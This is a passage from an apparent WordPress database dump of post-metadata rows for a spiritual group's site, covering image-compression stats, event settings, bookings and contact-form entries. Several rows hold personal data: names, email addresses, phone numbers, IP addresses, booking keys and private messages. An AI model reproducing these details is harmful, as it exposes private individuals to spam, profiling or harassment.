WP-Optimize'),(189980,268899,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:92854;s:12:\"smushed-size\";i:72162;s:15:\"savings-percent\";d:22.280000000000001136868377216160297393798828125;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:92854;s:10:\"compressed\";i:72162;}s:6:\"medium\";a:2:{s:8:\"original\";i:3695;s:10:\"compressed\";i:3629;}s:5:\"large\";a:2:{s:8:\"original\";i:19569;s:10:\"compressed\";i:19569;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:1415;s:10:\"compressed\";i:1349;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:12056;s:10:\"compressed\";i:12056;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:3485;s:10:\"compressed\";i:3419;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:7414;s:10:\"compressed\";i:7348;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:6140;s:10:\"compressed\";i:6074;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:4550;s:10:\"compressed\";i:4484;}s:8:\"tileview\";a:2:{s:8:\"original\";i:3564;s:10:\"compressed\";i:3498;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:39245;s:10:\"compressed\";i:39245;}}}'),(190195,268931,'_field_224','John'),(193858,269224,'_seq_num','80'),(189977,268899,'original-file','2023/08/creamy-blue-bk-updraft-pre-smush-original.jpg'),(189974,268899,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1913;s:6:\"height\";i:1071;s:4:\"file\";s:26:\"2023/08/creamy-blue-bk.jpg\";s:8:\"filesize\";i:92854;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3695;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"creamy-blue-bk-1024x573.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:573;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19569;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1415;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-768x430.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12056;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3485;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7414;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6140;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4550;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"creamy-blue-bk-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3564;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"creamy-blue-bk-1536x860.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:860;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39245;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189973,268899,'_wp_attached_file','2023/08/creamy-blue-bk.jpg'),(189972,268897,'_seq_num','143'),(189971,268897,'_form_id','13'),(189970,268897,'_field_138','Brave'),(189969,268897,'_field_137','Testing Brave'),(189968,268897,'_field_135','choll.03@comcast.net'),(189967,268897,'_field_134','Brave'),(189966,268897,'_field_133','Testing'),(189954,268895,'_field_135','choll.03@comcast.net'),(189955,268895,'_field_137','Testing Edge'),(189956,268895,'_field_138','Testing Edge'),(189957,268895,'_form_id','13'),(189958,268895,'_seq_num','141'),(189959,268896,'_field_133','Testing Chrome'),(189960,268896,'_field_134','Chrome'),(189961,268896,'_field_135','choll.03@comcast.net'),(189962,268896,'_field_137','Testing Chrome'),(189963,268896,'_field_138','Chrome'),(189964,268896,'_form_id','13'),(189965,268896,'_seq_num','142'),(156538,266400,'smush-complete','1'),(156539,266400,'smush-info','The file was compressed from 56.10 KB to 55.16 KB saving 1.69 percent using WP-Optimize'),(156540,266400,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:57451;s:12:\"smushed-size\";i:56481;s:15:\"savings-percent\";d:1.689999999999999946709294817992486059665679931640625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:57451;s:10:\"compressed\";i:56481;}s:6:\"medium\";a:2:{s:8:\"original\";i:14209;s:10:\"compressed\";i:14209;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7002;s:10:\"compressed\";i:6936;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20407;s:10:\"compressed\";i:20352;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:33255;s:10:\"compressed\";i:33255;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24372;s:10:\"compressed\";i:24342;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23839;s:10:\"compressed\";i:23839;}}}'),(189953,268895,'_field_134','Edge'),(189952,268895,'_field_133','Testing'),(189951,268894,'_seq_num','140'),(189950,268894,'_form_id','13'),(152154,266103,'_edit_last','2'),(152155,266105,'_wp_attached_file','2021/12/pastel-daisies.jpg'),(152156,266105,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:26:\"2021/12/pastel-daisies.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"pastel-daisies-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"pastel-daisies-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"pastel-daisies-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"pastel-daisies-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"pastel-daisies-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"pastel-daisies-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"pastel-daisies-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(152157,266103,'_thumbnail_id','266105'),(152158,266107,'_field_312','Jacob'),(152159,266107,'_field_313','Snider'),(152160,266107,'_field_333','3157759244'),(152161,266107,'_field_314','keepkind719@gmail.com'),(152162,266107,'_field_315','I AM '),(152163,266107,'_field_316','Hello, I\'m extremely interested in what I\'ve read so far, and would like to know where, and how to learn more. I have had multiple spiritual events happen in my life... They\'re becoming more, and more frequent, and I\'m not exactly sure what it all means, or how I\'m suppose to proceed... I await your response, and I thank you for your time...\n\n'),(152164,266107,'_form_id','35'),(152165,266107,'_seq_num','45'),(152166,266108,'_field_30','Jean'),(152167,266108,'_field_31','Davis'),(152168,266108,'_field_32',''),(152169,266108,'_field_33','jean5030@gmail.com'),(152170,266108,'_field_34',''),(152171,266108,'_field_35',''),(152172,266108,'_field_36','Please Choose Your State'),(152173,266108,'_field_37','US'),(152174,266108,'_field_39',''),(152175,266108,'_form_id','4'),(152176,266108,'_seq_num','18'),(152177,266109,'protect_children',''),(152178,266109,'mec_color',''),(152179,266109,'mec_location_id','118'),(152180,266109,'mec_dont_show_map','0'),(152181,266109,'mec_organizer_id','1'),(152182,266109,'mec_read_more',''),(152183,266109,'mec_more_info',''),(152184,266109,'mec_more_info_title',''),(152185,266109,'mec_more_info_target','_self'),(152186,266109,'mec_cost',''),(152187,266109,'mec_currency','a:0:{}'),(152188,266109,'mec_additional_organizer_ids','a:0:{}'),(152189,266109,'mec_additional_location_ids','a:0:{}'),(152190,266109,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-05\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-05\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152191,266109,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152192,266109,'mec_certain_weekdays','a:0:{}'),(152193,266109,'mec_allday','0'),(152194,266109,'one_occurrence','0'),(152195,266109,'mec_hide_time','0'),(152196,266109,'mec_hide_end_time','0'),(152197,266109,'mec_comment',''),(152198,266109,'mec_timezone','global'),(152199,266109,'mec_countdown_method','global'),(152200,266109,'mec_public','1'),(152201,266109,'mec_start_date','2022-01-05'),(152202,266109,'mec_start_time_hour','7'),(152203,266109,'mec_start_time_minutes','0'),(152204,266109,'mec_start_time_ampm','PM'),(152205,266109,'mec_start_day_seconds','68400'),(152206,266109,'mec_end_date','2022-01-05'),(152207,266109,'mec_end_time_hour','8'),(152208,266109,'mec_end_time_minutes','0'),(152209,266109,'mec_end_time_ampm','PM'),(152210,266109,'mec_end_day_seconds','72000'),(152211,266109,'mec_repeat_status','0'),(152212,266109,'mec_repeat_type',''),(152213,266109,'mec_repeat_interval','1'),(152214,266109,'mec_repeat_end',''),(152215,266109,'mec_repeat_end_at_occurrences',''),(152216,266109,'mec_repeat_end_at_date',''),(152217,266109,'mec_advanced_days','a:0:{}'),(152218,266109,'mec_in_days',''),(152219,266109,'mec_not_in_days',''),(152220,266109,'mec_hourly_schedules','a:0:{}'),(152221,266109,'mec_booking','a:0:{}'),(152222,266109,'mec_tickets','a:0:{}'),(152223,266109,'mec_fees_global_inheritance','1'),(152224,266109,'mec_fees','a:0:{}'),(152225,266109,'mec_ticket_variations_global_inheritance','1'),(152226,266109,'mec_ticket_variations','a:0:{}'),(152227,266109,'mec_reg_fields_global_inheritance','1'),(152228,266109,'mec_reg_fields','a:0:{}'),(152229,266109,'mec_bfixed_fields','a:0:{}'),(152230,266109,'mec_op','a:0:{}'),(152231,266109,'mec_fields','a:0:{}'),(152232,266109,'mec_event_status','EventScheduled'),(152233,266109,'mec_moved_online_link',''),(152234,266109,'mec_cancelled_reason',''),(152235,266109,'mec_display_cancellation_reason_in_single_page',''),(152236,266109,'boldgrid_hide_page_title','0'),(152237,266109,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(152238,266109,'passster_activate_global_protection',NULL),(152239,266109,'passster_activate_protection',NULL),(152240,266109,'passster_protection_type','password'),(152242,266109,'_dp_original','266104'),(152243,266109,'_edit_lock','1640800635:2'),(152244,266109,'_edit_last','2'),(152245,266109,'_thumbnail_id','265245'),(152246,266111,'_field_312','Eve'),(152247,266111,'_field_313','Lintner'),(152248,266111,'_field_333','360-813-8445'),(152249,266111,'_field_314','relintner@gmail.com'),(152250,266111,'_field_315','Books to give away'),(152251,266111,'_field_316','I have several Eckankar books I would like to donate. I live in Pueblo West. Is there a place where I can take them?'),(152252,266111,'_form_id','35'),(152253,266111,'_seq_num','46'),(152262,266113,'_field_474','Jon'),(152263,266113,'_field_475','Brunner'),(152264,266113,'_field_476','brunnerjon@hotmail.com'),(152265,266113,'_form_id','51'),(152266,266113,'_seq_num','8'),(152267,266114,'_field_450','Jon'),(152268,266114,'_field_451','Brunner'),(152269,266114,'_field_458','9705875037'),(152270,266114,'_field_452','brunnerjon@hotmail.com'),(152271,266114,'_field_453','Information on Joining Eckankar'),(152272,266114,'_field_454','Have read a few books on the Eck masters, soul travel, exercises and have\ndoubts. Is this to good to be true?'),(152273,266114,'_form_id','49'),(152274,266114,'_seq_num','5'),(161396,266662,'mec_cancellation_key','ec700ea47e0c08118ca2f41b512bbd76'),(161395,266662,'mec_verification_key','c93c88040cbb3e3f088a627774d82c4c'),(161394,266662,'mec_verified','1'),(161393,266662,'mec_user_id','1000009'),(161392,266662,'mec_transaction_id','EWV99156'),(161391,266661,'mec_gateway_label','Free'),(161390,266661,'mec_gateway','MEC_gateway_free'),(161389,266661,'mec_price','0'),(161385,266661,'mec_book_date_submit','20220508090737'),(161386,266661,'mec_booking_location','129'),(161387,266661,'mec_ticket_price_1','0'),(161388,266661,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:29:\"jackiedianeroberts@icloud.com\";s:4:\"name\";s:24:\"Jacqueline Diane Roberts\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"99.126.115.16\";}}'),(161383,266661,'mec_attention_time_start','1652005800'),(161384,266661,'mec_attention_time_end','1652052600'),(161382,266661,'mec_attention_time','1652005800:1652052600'),(161381,266661,'mec_other_dates','a:0:{}'),(161380,266661,'mec_all_dates','a:0:{}'),(161379,266661,'mec_booking_time','2022-05-08 09:07:37'),(161378,266661,'mec_ticket_id',',1,'),(161377,266661,'mec_date','1652005800:1652052600'),(161376,266661,'mec_event_id','266568'),(161375,266661,'mec_confirmed','1'),(161374,266661,'mec_cancellation_key','8ccdc2b4ef428cee4efb500a4e208cff'),(161373,266661,'mec_verification_key','52f4eb95cf95c8c3e3f92ccda311215f'),(161372,266661,'mec_verified','1'),(161371,266661,'mec_user_id','1000008'),(161370,266661,'mec_transaction_id','NZC30524'),(161369,266660,'mec_gateway_label','Free'),(161368,266660,'mec_gateway','MEC_gateway_free'),(161367,266660,'mec_price','0'),(161366,266660,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:16:\"Marc Massengale \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"73.95.97.86\";}}'),(161365,266660,'mec_ticket_price_1','0'),(161364,266660,'mec_booking_location','129'),(161363,266660,'mec_book_date_submit','20220508090058'),(161362,266660,'mec_attention_time_end','1652052600'),(161361,266660,'mec_attention_time_start','1652005800'),(161360,266660,'mec_attention_time','1652005800:1652052600'),(161359,266660,'mec_other_dates','a:0:{}'),(161358,266660,'mec_all_dates','a:0:{}'),(161343,266634,'smush-complete',''),(161344,266627,'smush-info','The file was compressed from 159.21 KB to 151.87 KB saving 4.61 percent using WP-Optimize'),(161346,266658,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/05/Karma.webp - cannot be optimized, it has an invalid file type'),(161345,266627,'smush-complete','1'),(161347,266658,'smush-complete',''),(161348,266660,'mec_transaction_id','UGK94037'),(161349,266660,'mec_user_id','1000007'),(161350,266660,'mec_verified','1'),(161351,266660,'mec_verification_key','b87e13dd1f5f7858938d22b6326bcd75'),(161352,266660,'mec_cancellation_key','35e08ba9e1007311c31b3ccc26aa7512'),(161353,266660,'mec_confirmed','1'),(161354,266660,'mec_event_id','266568'),(161355,266660,'mec_date','1652005800:1652052600'),(161356,266660,'mec_ticket_id',',1,'),(161357,266660,'mec_booking_time','2022-05-08 09:00:58'),(161342,266634,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/05/JewelsOfWisdom.webp - cannot be optimized, it has an invalid file type'),(161341,266657,'_thumbnail_id','266658'),(152342,266117,'_wp_attached_file','2021/12/masters-greeting-1.jpg'),(152343,266117,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:403;s:4:\"file\";s:30:\"2021/12/masters-greeting-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"masters-greeting-1-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"masters-greeting-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:30:\"masters-greeting-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:30:\"masters-greeting-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:30:\"masters-greeting-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:30:\"masters-greeting-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"masters-greeting-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(152344,266117,'original-file','2021/12/masters-greeting-1-updraft-pre-smush-original.jpg'),(152345,266117,'smush-complete','1'),(152346,266117,'smush-info','The file was compressed from 52.11 KB to 50.07 KB saving 3.91 percent using WP-Optimize'),(152347,266117,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:53364;s:12:\"smushed-size\";i:51276;s:15:\"savings-percent\";d:3.910000000000000142108547152020037174224853515625;}'),(152348,266105,'original-file','2021/12/pastel-daisies-updraft-pre-smush-original.jpg'),(152349,266105,'smush-complete','1'),(152350,266105,'smush-info','The file was compressed from 50.19 KB to 49.17 KB saving 2.02 percent using WP-Optimize'),(152351,266105,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:51392;s:12:\"smushed-size\";i:50353;s:15:\"savings-percent\";d:2.020000000000000017763568394002504646778106689453125;}'),(152356,266118,'_seq_num','21'),(152357,266119,'_field_133','Michael'),(152358,266119,'_field_134','Boyd'),(152359,266119,'_field_135','mboyd623@gmail.com'),(152360,266119,'_field_137','Satsang'),(152361,266119,'_field_138','I am in \"The Precepts of Eckankar\" Satsang and would like to get the email of the moderator. I somehow deleted it from my emails.\n\nThanks'),(152362,266119,'_form_id','13'),(152363,266119,'_seq_num','94'),(152364,266120,'_field_224','Elizabeth'),(152365,266120,'_field_225','Hartmann'),(152366,266120,'_field_226','elisamira@gmx.de'),(152367,266120,'_field_227','CO'),(152368,266120,'_field_228','DE'),(152369,266120,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(152370,266120,'_form_id','21'),(152371,266120,'_seq_num','141'),(152372,266121,'_field_446','Elizabeth'),(152373,266121,'_field_447','Hartmann'),(152374,266121,'_field_448','elisamira@gmx.de'),(152375,266121,'_form_id','48'),(152376,266121,'_seq_num','14'),(152377,266122,'protect_children',''),(152378,266122,'mec_color',''),(152379,266122,'mec_location_id','131'),(152380,266122,'mec_dont_show_map','0'),(152381,266122,'mec_organizer_id','1'),(152382,266122,'mec_start_date','2022-01-16'),(152383,266122,'mec_start_time_hour','1'),(152384,266122,'mec_start_time_minutes','0'),(152385,266122,'mec_start_time_ampm','PM'),(152386,266122,'mec_start_day_seconds','46800'),(152387,266122,'mec_end_date','2022-01-16'),(152388,266122,'mec_end_time_hour','2'),(152389,266122,'mec_end_time_minutes','0'),(152390,266122,'mec_end_time_ampm','PM'),(152391,266122,'mec_end_day_seconds','50400'),(152392,266122,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-16\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-16\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152393,266122,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152394,266122,'mec_certain_weekdays','a:0:{}'),(152395,266122,'mec_allday','0'),(152396,266122,'mec_hide_time','0'),(152397,266122,'mec_hide_end_time','0'),(152398,266122,'mec_comment',''),(152399,266122,'mec_repeat_status','0'),(152400,266122,'mec_repeat_type',''),(152401,266122,'mec_repeat_interval','1'),(152402,266122,'mec_repeat_end',''),(152403,266122,'mec_repeat_end_at_occurrences',''),(152404,266122,'mec_repeat_end_at_date',''),(152405,266122,'mec_advanced_days','a:0:{}'),(152406,266122,'mec_in_days',''),(152407,266122,'mec_not_in_days',''),(152408,266122,'mec_hourly_schedules','a:0:{}'),(152409,266122,'mec_booking','a:0:{}'),(152410,266122,'mec_tickets','a:0:{}'),(152411,266122,'mec_fees_global_inheritance','1'),(152412,266122,'mec_fees','a:0:{}'),(152413,266122,'mec_ticket_variations_global_inheritance','1'),(152414,266122,'mec_ticket_variations','a:0:{}'),(152415,266122,'mec_reg_fields_global_inheritance','1'),(152416,266122,'mec_reg_fields','a:0:{}'),(152417,266122,'mec_op','a:0:{}'),(152418,266122,'mec_event_date_submit','20210422105713'),(152419,266122,'mec_read_more',''),(152420,266122,'mec_more_info',''),(152421,266122,'mec_more_info_title',''),(152422,266122,'mec_more_info_target','_self'),(152423,266122,'mec_cost',''),(152424,266122,'mec_currency','a:0:{}'),(152425,266122,'mec_additional_organizer_ids','a:0:{}'),(152426,266122,'mec_additional_location_ids','a:0:{}'),(152427,266122,'one_occurrence','0'),(152428,266122,'mec_timezone','global'),(152429,266122,'mec_countdown_method','global'),(152430,266122,'mec_public','1'),(152431,266122,'mec_bfixed_fields','a:0:{}'),(152432,266122,'mec_fields','a:0:{}'),(152433,266122,'mec_event_status','EventScheduled'),(152434,266122,'mec_moved_online_link',''),(152435,266122,'mec_cancelled_reason',''),(152436,266122,'mec_display_cancellation_reason_in_single_page',''),(152437,266122,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(152438,266122,'passster_activate_global_protection',NULL),(152439,266122,'passster_activate_protection',NULL),(152440,266122,'passster_protection_type','password'),(152441,266122,'_dp_original','265425'),(152442,266122,'_edit_lock','1641503118:2'),(152443,266122,'_edit_last','2'),(152444,266122,'_thumbnail_id','266036'),(152445,266123,'_wp_attached_file','2022/01/winter-4B.jpg'),(152446,266123,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:879;s:4:\"file\";s:21:\"2022/01/winter-4B.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"winter-4B-300x137.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"winter-4B-1024x469.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:469;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"winter-4B-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_l